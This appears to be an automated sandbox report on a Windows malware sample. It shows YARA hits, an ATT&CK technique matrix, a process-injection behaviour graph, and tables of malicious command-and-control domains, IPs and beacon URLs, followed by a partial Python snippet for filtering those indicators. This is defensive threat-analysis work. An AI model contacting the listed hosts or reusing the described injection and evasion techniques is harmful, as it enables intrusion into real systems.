          Source: Yara match | File source: 00000006.00000002.267667639.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000A.00000002.475304202.0000000003350000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 6.2.vBugmobiJh.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 6.2.vBugmobiJh.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.vBugmobiJh.exe.382c390.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.vBugmobiJh.exe.387b9b0.3.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Shared Modules1 | Path Interception | Process Injection612 | Masquerading1 | OS Credential Dumping | Security Software Discovery221 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Encrypted Channel1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Virtualization/Sandbox Evasion3 | LSASS Memory | Virtualization/Sandbox Evasion3 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools11 | Security Account Manager | Process Discovery2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection612 | NTDS | Remote System Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol13 | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information1 | LSA Secrets | System Information Discovery112 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information41 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing13 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact

          Behavior Graph

          Behavior Graph ID: 356496, Sample: vBugmobiJh.exe, Startdate: 23/02/2021, Architecture: WINDOWS, Score: 100

          Start
            DNS/IP: www.activagebenefits.net; activagebenefits.net
            Signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Multi AV Scanner detection for domain / URL; Found malware configuration; 10 other signatures
            -> vBugmobiJh.exe (started)
               Dropped: C:\Users\user\AppData\...\vBugmobiJh.exe.log, ASCII
               Signatures: Tries to detect virtualization through RDTSC time measurements; Injects a PE file into a foreign processes
               -> vBugmobiJh.exe (started)
                  Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
                  -> explorer.exe (injected)
                     DNS/IP: rizrvd.com 34.102.136.180, 49731, 49737, 49738, GOOGLEUS, United States; www.thebabyfriendly.com 154.80.226.18, 49745, 80, DXTL-HKDXTLTseungKwanOServiceHK, Seychelles; 17 other IPs or domains
                     Signatures: System process connects to network (likely due to code injection or exploit)
                     -> netsh.exe (started)
                        Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                        -> cmd.exe (started)
                           -> conhost.exe (started)
               -> vBugmobiJh.exe (started)


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label | Link
          vBugmobiJh.exe | 25% | Virustotal | | Browse
          vBugmobiJh.exe | 100% | Joe Sandbox ML | |

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          Source | Detection | Scanner | Label | Link | Download
          6.2.vBugmobiJh.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File

          Domains

          Source | Detection | Scanner | Label | Link
          climaxnovels.com | 6% | Virustotal | | Browse
          ramjamdee.com | 1% | Virustotal | | Browse

          URLs

          Source | Detection | Scanner | Label | Link
          http://www.founder.com.cn/cnO | 0% | Avira URL Cloud | safe |
          http://www.jiyu-kobo.co.jp/Y0ntPi | 0% | Avira URL Cloud | safe |
          http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe |
          http://www.fontbureau.comsiefd$P | 0% | Avira URL Cloud | safe |
          http://www.jiyu-kobo.co.jp/uild$P | 0% | Avira URL Cloud | safe |
          http://www.rizrvd.com/bw82/?2dspCJ=AJ+QNFfpTCGoeNdN3oQHABBFVni950JEMBWacmvnp29IOaric6KDWsJikAvcMmAxBpMV&L6Ah=2dPLKjuxNzghip | 0% | Avira URL Cloud | safe |
          http://www.tiro.com | 0% | URL Reputation | safe |
          http://www.fontbureau.comsP | 0% | Avira URL Cloud | safe |
          http://www.wellnesssensation.com/bw82/?L6Ah=2dPLKjuxNzghip&2dspCJ=455EGVYP5nwn6UKaNruX/4AMFbR5eugGoFi+RSiFi9xq+Sc4S/7LJuL4z/DBianrCvuj | 0% | Avira URL Cloud | safe |
          http://www.fontbureau.comepko | 0% | URL Reputation | safe |
          http://www.goodfont.co.kr | 0% | URL Reputation | safe |
          http://www.fontbureau.comM.TTFzP | 0% | Avira URL Cloud | safe |
          http://www.sajatypeworks.com | 0% | URL Reputation | safe |
          http://www.typography.netD | 0% | URL Reputation | safe |
          http://www.gallerybrows.com/bw82/?2dspCJ=qtQC6ueLh9SPHvPoeB2W7XMv4DHg8NEty8uJPphl3NdNxxbo+oCUuV5k45UTpNkEWHc7&L6Ah=2dPLKjuxNzghip | 0% | Avira URL Cloud | safe |
          http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe |
          http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe |
          http://fontfabrik.com | 0% | URL Reputation | safe |
          http://www.fontbureau.comB.TTF | 0% | URL Reputation | safe |
          http://www.jiyu-kobo.co.jp// | 0% | URL Reputation | safe |
          http://www.founder.com.cn/cnt | 0% | URL Reputation | safe |
          http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe |
          http://www.jiyu-kobo.co.jp/Y0 | 0% | URL Reputation | safe |
          http://www.usmedicarenow.com/bw82/?2dspCJ=cQgJWKf8RQ1tgXmhpNlNvU1Wcwt7yBWYkRci+XoIvJPaxwQIB73a/eHibjyZxTY12AhF&L6Ah=2dPLKjuxNzghip | 0% | Avira URL Cloud | safe |
          http://www.ascendercorp.com/typedesigners.html | 0% | URL Reputation | safe |
          http://www.sandoll.co.kr | 0% | URL Reputation | safe |
          http://www.jiyu-kobo.co.jp/jp/2P | 0% | Avira URL Cloud | safe |
          http://www.urwpp.deDPlease | 0% | URL Reputation | safe |
          http://www.urwpp.de | 0% | URL Reputation | safe |
          http://www.zhongyicts.com.cn | 0% | URL Reputation | safe |
          http://www.jiyu-kobo.co.jp/tendHP | 0% | Avira URL Cloud | safe |
          http://www.sakkal.com | 0% | URL Reputation | safe |
          http://www.founder.com.cn/cnh | 0% | Avira URL Cloud | safe |
          http://www.jiyu-kobo.co.jp/ltt=P | 0% | Avira URL Cloud | safe |
          http://www.jiyu-kobo.co.jp//P | 0% | Avira URL Cloud | safe |
          http://www.founder.com.cn/cnd | 0% | URL Reputation | safe |
          http://www.jiyu-kobo.co.jp/oiolP | 0% | Avira URL Cloud | safe |
          http://www.galapagosdesign.com/ | 0% | URL Reputation | safe |
          http://www.climaxnovels.com/bw82/?2dspCJ=ErYhPq0/zQvehGK9wS6+i9BP1HsxrMLlWLaBPkVFk6gJ3Rf5IPX3ZCPP9+b6hANSOkIk&L6Ah=2dPLKjuxNzghip | 0% | Avira URL Cloud | safe |
          www.rizrvd.com/bw82/ | 0% | Avira URL Cloud | safe |
          http://www.agfamonotype. | 0% | URL Reputation | safe |
          http://www.galapagosdesign.com/%k | 0% | Avira URL Cloud | safe |
          http://www.jiyu-kobo.co.jp/vno | 0% | Avira URL Cloud | safe |
          http://www.thebabyfriendly.com/bw82/?L6Ah=2dPLKjuxNzghip&2dspCJ=r3fdhBxfm/17hO+WGttpxejAYTJXJLNaeaIMUW/kEa9Q3oKyIBTjSr0cbQanu0dSY6cl | 0% | Avira URL Cloud | safe |
          http://www.fontbureau.comcomm | 0% | Avira URL Cloud | safe |
          http://www.h2oturkiye.com/bw82/?2dspCJ=CMr/hCS473yTOMLQRlwKDrCPfcrQCABATOinOmsXstIRfABY7iJyJix7IPLOuntXuF5p&L6Ah=2dPLKjuxNzghip | 0% | Avira URL Cloud | safe |
          http://www.jiyu-kobo.co.jp/jp/ | 0% | URL Reputation | safe |
          http://www.fonts.comKr | 0% | Avira URL Cloud | safe |
          http://www.jiyu-kobo.co.jp/2P | 0% | Avira URL Cloud | safe |
          http://www.carterandcone.coml | 0% | URL Reputation | safe |

          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          climaxnovels.com | 34.102.136.180 | true | true | | unknown
          ramjamdee.com | 34.102.136.180 | true | true | | unknown
          www.thebabyfriendly.com | 154.80.226.18 | true | true | | unknown
          www.wellnesssensation.com | 52.128.23.153 | true | true | | unknown
          h2oturkiye.com | 94.73.146.42 | true | true | | unknown
          www.yjpps.com | 0.0.0.0 | true | false | | unknown
          gallerybrows.com | 34.102.136.180 | true | true | | unknown
          gdsjgf.com | 34.102.136.180 | true | true | | unknown
          ext-sq.squarespace.com | 198.185.159.144 | true | false | | high
          activagebenefits.net | 34.102.136.180 | true | true | | unknown
          rizrvd.com | 34.102.136.180 | true | true | | unknown
          www.ramjamdee.com | unknown | unknown | true | | unknown
          www.activagebenefits.net | unknown | unknown | true | | unknown
          www.fcoins.club | unknown | unknown | true | | unknown
          www.gallerybrows.com | unknown | unknown | true | | unknown
          www.usmedicarenow.com | unknown | unknown | true | | unknown
          www.h2oturkiye.com | unknown | unknown | true | | unknown
          www.climaxnovels.com | unknown | unknown | true | | unknown
          www.gdsjgf.com | unknown | unknown | true | | unknown
          www.chrisbubser.digital | unknown | unknown | true | | unknown
          www.rizrvd.com | unknown | unknown | true | | unknown

                                                Contacted URLs

          Name | Malicious | Antivirus Detection | Reputation
          http://www.rizrvd.com/bw82/?2dspCJ=AJ+QNFfpTCGoeNdN3oQHABBFVni950JEMBWacmvnp29IOaric6KDWsJikAvcMmAxBpMV&L6Ah=2dPLKjuxNzghip | true | Avira URL Cloud: safe | unknown
          http://www.wellnesssensation.com/bw82/?L6Ah=2dPLKjuxNzghip&2dspCJ=455EGVYP5nwn6UKaNruX/4AMFbR5eugGoFi+RSiFi9xq+Sc4S/7LJuL4z/DBianrCvuj | true | Avira URL Cloud: safe | unknown
          http://www.gallerybrows.com/bw82/?2dspCJ=qtQC6ueLh9SPHvPoeB2W7XMv4DHg8NEty8uJPphl3NdNxxbo+oCUuV5k45UTpNkEWHc7&L6Ah=2dPLKjuxNzghip | true | Avira URL Cloud: safe | unknown
          http://www.usmedicarenow.com/bw82/?2dspCJ=cQgJWKf8RQ1tgXmhpNlNvU1Wcwt7yBWYkRci+XoIvJPaxwQIB73a/eHibjyZxTY12AhF&L6Ah=2dPLKjuxNzghip | true | Avira URL Cloud: safe | unknown
          http://www.climaxnovels.com/bw82/?2dspCJ=ErYhPq0/zQvehGK9wS6+i9BP1HsxrMLlWLaBPkVFk6gJ3Rf5IPX3ZCPP9+b6hANSOkIk&L6Ah=2dPLKjuxNzghip | true | Avira URL Cloud: safe | unknown
          www.rizrvd.com/bw82/ | true | Avira URL Cloud: safe | low
          http://www.thebabyfriendly.com/bw82/?L6Ah=2dPLKjuxNzghip&2dspCJ=r3fdhBxfm/17hO+WGttpxejAYTJXJLNaeaIMUW/kEa9Q3oKyIBTjSr0cbQanu0dSY6cl | true | Avira URL Cloud: safe | unknown
          http://www.h2oturkiye.com/bw82/?2dspCJ=CMr/hCS473yTOMLQRlwKDrCPfcrQCABATOinOmsXstIRfABY7iJyJix7IPLOuntXuF5p&L6Ah=2dPLKjuxNzghip | true | Avira URL Cloud: safe | unknown
          http://www.activagebenefits.net/bw82/?L6Ah=2dPLKjuxNzghip&2dspCJ=kkzs7wdk+a5EmvlejfiLHnYXY/z1ZZpbk/A0waQQyoH3vrpc5BJXUH7YClYSBXJaDwsI | true | Avira URL Cloud: safe | unknown
          http://www.ramjamdee.com/bw82/?L6Ah=2dPLKjuxNzghip&2dspCJ=G5V/jI1lXUWhm2/po/i12Eg93VLS1Yw8/s5fANqQYS1eyL2v/ZzyMw3Ygf/31m6ddEJO | true | Avira URL Cloud: safe | unknown
          http://www.gdsjgf.com/bw82/?L6Ah=2dPLKjuxNzghip&2dspCJ=7KG5rMnJQVi61jAewyvwq06b8xrmRTVdiDIOhf904IMqwa5VOrK6tjTZXar9S1Zs43DY | true | Avira URL Cloud: safe | unknown

                                                URLs from Memory and Binaries

          Name | Source | Malicious | Antivirus Detection | Reputation
          http://www.founder.com.cn/cnO | vBugmobiJh.exe, 00000001.00000003.211340323.0000000005727000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
          http://www.fontbureau.com/designersG | vBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmp | false | | high
          http://www.jiyu-kobo.co.jp/Y0ntPi | vBugmobiJh.exe, 00000001.00000003.214840427.0000000005725000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
          http://www.fontbureau.com/designers/? | vBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmp | false | | high
          http://www.founder.com.cn/cn/bThe | vBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.fontbureau.comsiefd$P | vBugmobiJh.exe, 00000001.00000003.216854776.0000000005725000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
          http://www.fontbureau.com/designers? | vBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmp | false | | high
          http://www.jiyu-kobo.co.jp/uild$P | vBugmobiJh.exe, 00000001.00000003.214092584.0000000005725000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
          http://www.tiro.com | explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.fontbureau.comsP | vBugmobiJh.exe, 00000001.00000003.216854776.0000000005725000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
          http://www.fontbureau.com/designers | explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmp | false | | high
          http://www.fontbureau.comepko | vBugmobiJh.exe, 00000001.00000003.227609079.0000000005720000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.goodfont.co.kr | vBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css | vBugmobiJh.exe, 00000001.00000002.229831410.00000000026F1000.00000004.00000001.sdmp | false | | high
          http://www.fontbureau.comM.TTFzP | vBugmobiJh.exe, 00000001.00000003.216854776.0000000005725000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
          http://www.sajatypeworks.com | vBugmobiJh.exe, 00000001.00000003.208761960.0000000005723000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmp | false
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.typography.netDvBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.founder.com.cn/cn/cThevBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.galapagosdesign.com/staff/dennis.htmvBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, vBugmobiJh.exe, 00000001.00000003.217860687.0000000005733000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://fontfabrik.comvBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.fontbureau.comB.TTFvBugmobiJh.exe, 00000001.00000003.227609079.0000000005720000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.jiyu-kobo.co.jp//vBugmobiJh.exe, 00000001.00000003.214092584.0000000005725000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.founder.com.cn/cntvBugmobiJh.exe, 00000001.00000003.211149216.0000000000D4D000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.galapagosdesign.com/DPleasevBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.jiyu-kobo.co.jp/Y0vBugmobiJh.exe, 00000001.00000003.214840427.0000000005725000.00000004.00000001.sdmp, vBugmobiJh.exe, 00000001.00000003.214092584.0000000005725000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.ascendercorp.com/typedesigners.htmlvBugmobiJh.exe, 00000001.00000003.214832645.0000000005766000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.fonts.comvBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmpfalse
                                                            high
                                                            http://www.sandoll.co.krvBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.jiyu-kobo.co.jp/jp/2PvBugmobiJh.exe, 00000001.00000003.214371711.0000000005725000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.urwpp.deDPleasevBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.urwpp.devBugmobiJh.exe, 00000001.00000003.216854776.0000000005725000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.zhongyicts.com.cnvBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.jiyu-kobo.co.jp/tendHPvBugmobiJh.exe, 00000001.00000003.214092584.0000000005725000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.sakkal.comvBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.founder.com.cn/cnhvBugmobiJh.exe, 00000001.00000003.211340323.0000000005727000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.jiyu-kobo.co.jp/ltt=PvBugmobiJh.exe, 00000001.00000003.214840427.0000000005725000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.jiyu-kobo.co.jp//PvBugmobiJh.exe, 00000001.00000003.214840427.0000000005725000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.founder.com.cn/cndvBugmobiJh.exe, 00000001.00000003.211098499.000000000572E000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.jiyu-kobo.co.jp/oiolPvBugmobiJh.exe, 00000001.00000003.214840427.0000000005725000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.apache.org/licenses/LICENSE-2.0vBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmpfalse
                                                              high
                                                              http://www.fontbureau.comvBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmpfalse
                                                                high
                                                                http://www.galapagosdesign.com/vBugmobiJh.exe, 00000001.00000003.218063402.0000000005725000.00000004.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.agfamonotype.vBugmobiJh.exe, 00000001.00000003.214840427.0000000005725000.00000004.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.galapagosdesign.com/%kvBugmobiJh.exe, 00000001.00000003.217860687.0000000005733000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.jiyu-kobo.co.jp/vnovBugmobiJh.exe, 00000001.00000003.214840427.0000000005725000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.fontbureau.comcommvBugmobiJh.exe, 00000001.00000003.216854776.0000000005725000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.jiyu-kobo.co.jp/jp/vBugmobiJh.exe, 00000001.00000003.214840427.0000000005725000.00000004.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.fonts.comKrvBugmobiJh.exe, 00000001.00000003.209223636.000000000573B000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.jiyu-kobo.co.jp/2PvBugmobiJh.exe, 00000001.00000003.214092584.0000000005725000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.carterandcone.comlvBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.founder.com.cn/cn/vBugmobiJh.exe, 00000001.00000003.211716442.0000000005726000.00000004.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.fontbureau.com/designers/cabarga.htmlNvBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmpfalse
                                                                  high
                                                                  http://www.ascendercorp.com/typedesigners.htmluvBugmobiJh.exe, 00000001.00000003.214832645.0000000005766000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://www.founder.com.cn/cnvBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://www.fontbureau.com/designers/frere-jones.htmlvBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, vBugmobiJh.exe, 00000001.00000003.216329040.0000000005739000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmpfalse
                                                                    high
                                                                    http://www.jiyu-kobo.co.jp/APvBugmobiJh.exe, 00000001.00000003.214092584.0000000005725000.00000004.00000001.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.fontbureau.comd2PvBugmobiJh.exe, 00000001.00000003.216854776.0000000005725000.00000004.00000001.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.jiyu-kobo.co.jp/esvBugmobiJh.exe, 00000001.00000003.214092584.0000000005725000.00000004.00000001.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.fontbureau.commvBugmobiJh.exe, 00000001.00000003.227609079.0000000005720000.00000004.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://www.jiyu-kobo.co.jp/vBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://www.fontbureau.com/designers8vBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmpfalse
                                                                      high
                                                                      http://www.fontbureau.com/designers/vBugmobiJh.exe, 00000001.00000003.215875793.0000000005760000.00000004.00000001.sdmpfalse
                                                                        high
                                                                        http://www.jiyu-kobo.co.jp/sPvBugmobiJh.exe, 00000001.00000003.214092584.0000000005725000.00000004.00000001.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://www.jiyu-kobo.co.jp/jp/zPvBugmobiJh.exe, 00000001.00000003.214092584.0000000005725000.00000004.00000001.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown

                                                                        Contacted IPs


                                                                        Public

IP | Domain | Country | ASN | ASN Name | Malicious
198.185.159.144 | unknown | United States | 53831 | SQUARESPACEUS | false
52.128.23.153 | unknown | United States | 19324 | DOSARRESTUS | true
34.102.136.180 | unknown | United States | 15169 | GOOGLEUS | true
154.80.226.18 | unknown | Seychelles | 134548 | DXTL-HKDXTLTseungKwanOServiceHK | true
94.73.146.42 | unknown | Turkey | 34619 | CIZGITR | true
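The Malicious column is the sandbox's own verdict, and an address is only a usable indicator while it is not shared infrastructure: 198.185.159.144 sits in ASN 53831 SQUARESPACEUS and is marked false here, even though the Joe Sandbox View / Context section further down ties it to other malicious samples. The Python below is an added example, not part of the report. It filters the table to routable addresses the sandbox flagged, and, for the four related-sample URLs listed under Joe Sandbox View / Context, checks whether they share one shape (a single short directory, then exactly two query parameters: one long base64-looking value and one short alphanumeric token) and counts the directory tokens that recur across hosts. The shape test is a heuristic written from those four rows, not a vetted signature; both inputs are constructed from the rows on this page.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Constructed input: the Contacted IPs table above as (ip, country, asn, asn_name, malicious).
CONTACTED_IPS = [
    ("198.185.159.144", "United States", 53831, "SQUARESPACEUS", False),
    ("52.128.23.153", "United States", 19324, "DOSARRESTUS", True),
    ("34.102.136.180", "United States", 15169, "GOOGLEUS", True),
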